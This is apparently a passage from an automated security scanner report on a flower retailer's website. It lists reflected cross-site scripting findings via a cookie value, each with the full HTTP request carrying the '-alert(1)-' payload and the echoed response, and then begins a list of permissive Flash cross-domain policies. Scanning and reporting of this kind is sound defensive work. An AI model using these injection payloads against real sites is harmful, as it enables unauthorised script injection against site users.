Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collection.do?dataset=10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000oqktH2yyDUkrp5oGcWwUdty:-1; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a30d7'-alert(1)-'2e0123800e7; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.1.10.1304902847; cmTPSet=Y; CMAVID=70091303843240316067555; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902848067&t2=-1&t3=1304902867488&lti=1304902867488&ln=tab3p1_header&hr=/collection.do%3Fdataset%3D10305&fti=&fn=searchform%3A0%3Bfindgiftform%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=w-Welcome%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:06:04 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 77410


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a30d7'-alert(1)-'2e0123800e7');

lpAddVars('page','pageid','collection');

//-->
...[SNIP]...

4.207. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6159f'-alert(1)-'cdaf5668b0f8fa9a7 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&dataset=10305&channel=&landing=&cm_cid=d10305&sku=91637L&quantity=1&recipient=-3&international=false&sympathy=false&zipCode=10010&recipientText=&recipient=-3&locationCode=1&deliveryDate=Thursday%2C+May.+19th&deliveryMonth=5&deliveryDay=19&deliveryYear=2011&baseCode=91637&actionEvent=upgrade&flexFlag=false&gptCode=geoSellCode&showAddon=&deliveryDateSelect=&setAlternates=&showAlternates=&contextPageType=PRODUCT&surchargeOnlyOptionId=&flexValue=&flexOptionId=&isGeoSell=false&addOnProduct=&addOnQty=1&addOnProduct=&addOnQty=1&addOnProduct=&addOnQty=1&addOnProduct=&addOnQty=1 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6186159f'-alert(1)-'cdaf5668b0f8fa9a7; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:27:55 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00008a8prhUh8SalRi2w6rkI-n_:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 41351


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6186159f'-alert(1)-'cdaf5668b0f8fa9a7');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.208. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8d5d'-alert(1)-'e0b56c90518 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?baseCode=91637&dataset=10305&cm_cid=d10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a8d5d'-alert(1)-'e0b56c90518; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000uX3-gHyeEcHw9aTrUn6TXJ9:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.3.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|3|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902894375&t2=1304902899114&t3=1304902906957&t4=1304902893038&lti=1304902906957&ln=&hr=/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&fti=&fn=searchform%3A0%3BguidedCollectionForm%3A1%3BsortForm%3A2%3BUNDEFINED%3A3%3B&ac=&fd=&uer=&fu=&pi=d10305-Collection%20Page%20-%20Spring&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:25 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000a_guHrmpfTHmaqhCaGjZetU:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 89668


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a8d5d'-alert(1)-'e0b56c90518');

lpAddVars('page','pageid','product');

//-->
...[SNIP]...

4.209. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40f86'-alert(1)-'ae4bf6d39bd71bd03 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do?actionEvent=shipping&cartItem%280%29.type=0&cartItem%280%29.itemId=5687d050-633d-4bcd-8079-f1cfa4a09ce8&cartItem%280%29.groupId=0&cartItem%280%29.flexOption=&cartItem%280%29.zip=10010&cartItem%280%29.international=false&cartItem%280%29.deliveryMonth=5&cartItem%280%29.deliveryDay=19&cartItem%280%29.deliveryYear=2011&cartItem%280%29.deliveryDate=Thursday%2C+May+19%2C+2011&cartItem%280%29.quantity=1&groupSize=1&cartItemsCount=1 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e61840f86'-alert(1)-'ae4bf6d39bd71bd03; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:34:08 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000drS1hk_yXE1LfymOJHvFSKB:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 41351


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e61840f86'-alert(1)-'ae4bf6d39bd71bd03');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.210. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f63bb'-alert(1)-'8f0589d6161 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618f63bb'-alert(1)-'8f0589d6161; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:15 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 41340


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618f63bb'-alert(1)-'8f0589d6161');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.211. https://ww30.1800flowers.com/checkoutsignin.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dc51'-alert(1)-'11e19fe15ec was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6183dc51'-alert(1)-'11e19fe15ec; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:39 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000z8k7FDy-3yn5v2TjyeJwm6H:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19854


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6183dc51'-alert(1)-'11e19fe15ec');

lpAddVars('page','pageid','checkoutsignin');

lpAddVars('page','ConversionStage','1-signin');

//-->
...[SNIP]...

4.212. https://ww30.1800flowers.com/continueasguest.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /continueasguest.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faeda'-alert(1)-'77ac67bb4e716afa5 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /continueasguest.do?x=74&y=15 HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: https://ww30.1800flowers.com/checkoutsignin.do
Cache-Control: max-age=0
Origin: https://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618faeda'-alert(1)-'77ac67bb4e716afa5; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:23:08 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 56035


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618faeda'-alert(1)-'77ac67bb4e716afa5');

lpAddVars('page','pageid','findgift');

lpAddVars('page','ERR01','Zip Code is invalid.');

lpAddVars('page','ErrorCounter','1');

//-->
...[SNIP]...

5. Flash cross-domain policy
There are 24 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 09 May 2011 01:09:32 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://ads.undertone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "3998220-fc-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 252
Content-Type: text/xml
Date: Mon, 09 May 2011 01:09:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://adsfac.us/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
